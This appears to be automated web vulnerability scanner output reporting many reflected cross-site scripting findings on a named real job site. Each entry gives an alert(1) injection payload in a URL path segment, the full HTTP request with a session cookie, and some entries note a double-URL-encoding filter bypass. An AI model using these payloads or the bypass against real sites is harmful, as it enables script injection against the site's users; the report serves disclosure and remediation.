The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f73e8"><img%20src%3da%20onerror%3dalert(1)>3a70b67ec54 was submitted in the REST URL parameter 4. This input was echoed as f73e8"><img src=a onerror=alert(1)>3a70b67ec54 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixtyf73e8"><img%20src%3da%20onerror%3dalert(1)>3a70b67ec54/css/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89175"><img%20src%3da%20onerror%3dalert(1)>0ae966e8e0d was submitted in the REST URL parameter 5. This input was echoed as 89175"><img src=a onerror=alert(1)>0ae966e8e0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css89175"><img%20src%3da%20onerror%3dalert(1)>0ae966e8e0d/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2b6"><img%20src%3da%20onerror%3dalert(1)>3c9d629728 was submitted in the REST URL parameter 6. This input was echoed as 4b2b6"><img src=a onerror=alert(1)>3c9d629728 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css/structure.css4b2b6"><img%20src%3da%20onerror%3dalert(1)>3c9d629728?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c822"><img%20src%3da%20onerror%3dalert(1)>883740fafdf was submitted in the REST URL parameter 1. This input was echoed as 1c822"><img src=a onerror=alert(1)>883740fafdf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites1c822"><img%20src%3da%20onerror%3dalert(1)>883740fafdf/all/themes/threesixty/js/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2148"><img%20src%3da%20onerror%3dalert(1)>5cc8b9e6428 was submitted in the REST URL parameter 2. This input was echoed as f2148"><img src=a onerror=alert(1)>5cc8b9e6428 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allf2148"><img%20src%3da%20onerror%3dalert(1)>5cc8b9e6428/themes/threesixty/js/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 555a2"><img%20src%3da%20onerror%3dalert(1)>14329ddbf68 was submitted in the REST URL parameter 3. This input was echoed as 555a2"><img src=a onerror=alert(1)>14329ddbf68 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes555a2"><img%20src%3da%20onerror%3dalert(1)>14329ddbf68/threesixty/js/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d94b"><img%20src%3da%20onerror%3dalert(1)>d650ca39f03 was submitted in the REST URL parameter 4. This input was echoed as 7d94b"><img src=a onerror=alert(1)>d650ca39f03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty7d94b"><img%20src%3da%20onerror%3dalert(1)>d650ca39f03/js/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867ae"><img%20src%3da%20onerror%3dalert(1)>ab43a14ef03 was submitted in the REST URL parameter 5. This input was echoed as 867ae"><img src=a onerror=alert(1)>ab43a14ef03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js867ae"><img%20src%3da%20onerror%3dalert(1)>ab43a14ef03/AC_RunActiveContent.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf1a2"><img%20src%3da%20onerror%3dalert(1)>9e8f0dc5747 was submitted in the REST URL parameter 6. This input was echoed as bf1a2"><img src=a onerror=alert(1)>9e8f0dc5747 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js/AC_RunActiveContent.jsbf1a2"><img%20src%3da%20onerror%3dalert(1)>9e8f0dc5747?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9369b"><img%20src%3da%20onerror%3dalert(1)>60bd3b3e611 was submitted in the REST URL parameter 1. This input was echoed as 9369b"><img src=a onerror=alert(1)>60bd3b3e611 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites9369b"><img%20src%3da%20onerror%3dalert(1)>60bd3b3e611/all/themes/threesixty/js/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7318"><img%20src%3da%20onerror%3dalert(1)>5390e89c2cb was submitted in the REST URL parameter 2. This input was echoed as b7318"><img src=a onerror=alert(1)>5390e89c2cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allb7318"><img%20src%3da%20onerror%3dalert(1)>5390e89c2cb/themes/threesixty/js/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29e37"><img%20src%3da%20onerror%3dalert(1)>1d222c0ec3b was submitted in the REST URL parameter 3. This input was echoed as 29e37"><img src=a onerror=alert(1)>1d222c0ec3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes29e37"><img%20src%3da%20onerror%3dalert(1)>1d222c0ec3b/threesixty/js/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b3d"><img%20src%3da%20onerror%3dalert(1)>924cd6c50ba was submitted in the REST URL parameter 4. This input was echoed as 76b3d"><img src=a onerror=alert(1)>924cd6c50ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a7c"><img%20src%3da%20onerror%3dalert(1)>eda61fe431e was submitted in the REST URL parameter 4. This input was echoed as 56a7c"><img src=a onerror=alert(1)>eda61fe431e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty56a7c"><img%20src%3da%20onerror%3dalert(1)>eda61fe431e/js/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80264"><img%20src%3da%20onerror%3dalert(1)>f6f1a8b106 was submitted in the REST URL parameter 5. This input was echoed as 80264"><img src=a onerror=alert(1)>f6f1a8b106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js80264"><img%20src%3da%20onerror%3dalert(1)>f6f1a8b106/easyTooltip.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb57e"><img%20src%3da%20onerror%3dalert(1)>5c57ffbac9c was submitted in the REST URL parameter 6. This input was echoed as cb57e"><img src=a onerror=alert(1)>5c57ffbac9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js/easyTooltip.jscb57e"><img%20src%3da%20onerror%3dalert(1)>5c57ffbac9c?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55d6e"><img%20src%3da%20onerror%3dalert(1)>17021c34628 was submitted in the REST URL parameter 1. This input was echoed as 55d6e"><img src=a onerror=alert(1)>17021c34628 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites55d6e"><img%20src%3da%20onerror%3dalert(1)>17021c34628/all/themes/threesixty/js/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94d19"><img%20src%3da%20onerror%3dalert(1)>638294a4b77 was submitted in the REST URL parameter 2. This input was echoed as 94d19"><img src=a onerror=alert(1)>638294a4b77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all94d19"><img%20src%3da%20onerror%3dalert(1)>638294a4b77/themes/threesixty/js/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f881"><img%20src%3da%20onerror%3dalert(1)>4e2f24ccbfa was submitted in the REST URL parameter 3. This input was echoed as 1f881"><img src=a onerror=alert(1)>4e2f24ccbfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes1f881"><img%20src%3da%20onerror%3dalert(1)>4e2f24ccbfa/threesixty/js/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f30d"><img%20src%3da%20onerror%3dalert(1)>db1815b09dc was submitted in the REST URL parameter 4. This input was echoed as 2f30d"><img src=a onerror=alert(1)>db1815b09dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty2f30d"><img%20src%3da%20onerror%3dalert(1)>db1815b09dc/js/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4930d"><img%20src%3da%20onerror%3dalert(1)>04f9905d679 was submitted in the REST URL parameter 4. This input was echoed as 4930d"><img src=a onerror=alert(1)>04f9905d679 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9c7a"><img%20src%3da%20onerror%3dalert(1)>e4699464745 was submitted in the REST URL parameter 5. This input was echoed as f9c7a"><img src=a onerror=alert(1)>e4699464745 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/jsf9c7a"><img%20src%3da%20onerror%3dalert(1)>e4699464745/effects.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f89d3"><img%20src%3da%20onerror%3dalert(1)>87598a82479 was submitted in the REST URL parameter 5. This input was echoed as f89d3"><img src=a onerror=alert(1)>87598a82479 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62b1"><img%20src%3da%20onerror%3dalert(1)>24eb6b0f0fc was submitted in the REST URL parameter 6. This input was echoed as f62b1"><img src=a onerror=alert(1)>24eb6b0f0fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/js/effects.jsf62b1"><img%20src%3da%20onerror%3dalert(1)>24eb6b0f0fc?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25e58"><img%20src%3da%20onerror%3dalert(1)>c35af25cab3 was submitted in the REST URL parameter 1. This input was echoed as 25e58"><img src=a onerror=alert(1)>c35af25cab3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites25e58"><img%20src%3da%20onerror%3dalert(1)>c35af25cab3/all/themes/threesixty/js/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bcef"><img%20src%3da%20onerror%3dalert(1)>3002399490 was submitted in the REST URL parameter 2. This input was echoed as 3bcef"><img src=a onerror=alert(1)>3002399490 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all3bcef"><img%20src%3da%20onerror%3dalert(1)>3002399490/themes/threesixty/js/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0d47"><img%20src%3da%20onerror%3dalert(1)>eca9130c7e0 was submitted in the REST URL parameter 3. This input was echoed as a0d47"><img src=a onerror=alert(1)>eca9130c7e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themesa0d47"><img%20src%3da%20onerror%3dalert(1)>eca9130c7e0/threesixty/js/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; has_js=1
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d2bc"><img%20src%3da%20onerror%3dalert(1)>f03d1286c4 was submitted in the REST URL parameter 4. This input was echoed as 2d2bc"><img src=a onerror=alert(1)>f03d1286c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty2d2bc"><img%20src%3da%20onerror%3dalert(1)>f03d1286c4/js/jquery.filestyle.mini.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
